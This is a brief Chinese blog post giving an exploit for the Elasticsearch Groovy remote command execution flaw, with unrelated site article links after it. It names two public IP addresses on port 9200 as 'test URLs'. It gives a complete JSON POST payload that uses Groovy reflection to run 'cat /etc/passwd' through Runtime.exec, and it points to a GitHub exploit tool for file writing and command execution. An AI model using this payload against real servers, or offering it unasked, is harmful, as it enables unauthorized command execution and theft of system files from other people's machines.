Elasticsearch Groovy任意命令执行漏洞EXP
2024-08-25 16:48:11
测试url:http://190.196.67.252:9200/_search?pretty
http://191.234.18.14:9200///_search?pretty
POST提交
{“size”:1,”script_fields”: {“iswin”: {“script”:”java.lang.Math.class.forName(\”java.io.BufferedReader\”).getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\”java.io.InputStreamReader\”).getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”cat /etc/passwd\”).getInputStream())).readLines()”,”lang”: “groovy”}}}
下面直接上EXP
文件写入 管理 命令执行
https://github.com/Svti/ElasticSearchEXP/
最新文章
- Redis指南
- 一次部署HTTPS的相关事件引发的思考
- BZOJ 2330: [SCOI2011]糖果 [差分约束系统] 【学习笔记】
- CH Round #30 摆花[矩阵乘法]
- jquery实现手风琴效果
- Java集合框架的接口和类层次关系结构图
- C#学习笔记----.net操作进程
- Localstorage本地存储兼容函数
- 如果重新设计网络,有没有可能合并IP地址跟MAC地址?
- 简单几何(凸包+枚举) POJ 1873 The Fortified Forest
- DataSnap中连接池的应用
- web.xml常用元素
- jvm栈和堆详解
- 三层——vb.net版
- lib-flexble 使用遇到的bug及解决方案
- 暑假集训D11总结
- 第三方Charts绘制图表四种形式:饼状图,雷达图,柱状图,直线图
- 在Windows 10 + Python 3.6.5 中用 pip 安装最新版 TensorFlow v1.8 for GPU
- 一个不错的git资源站点
- .NET Core中使用Docker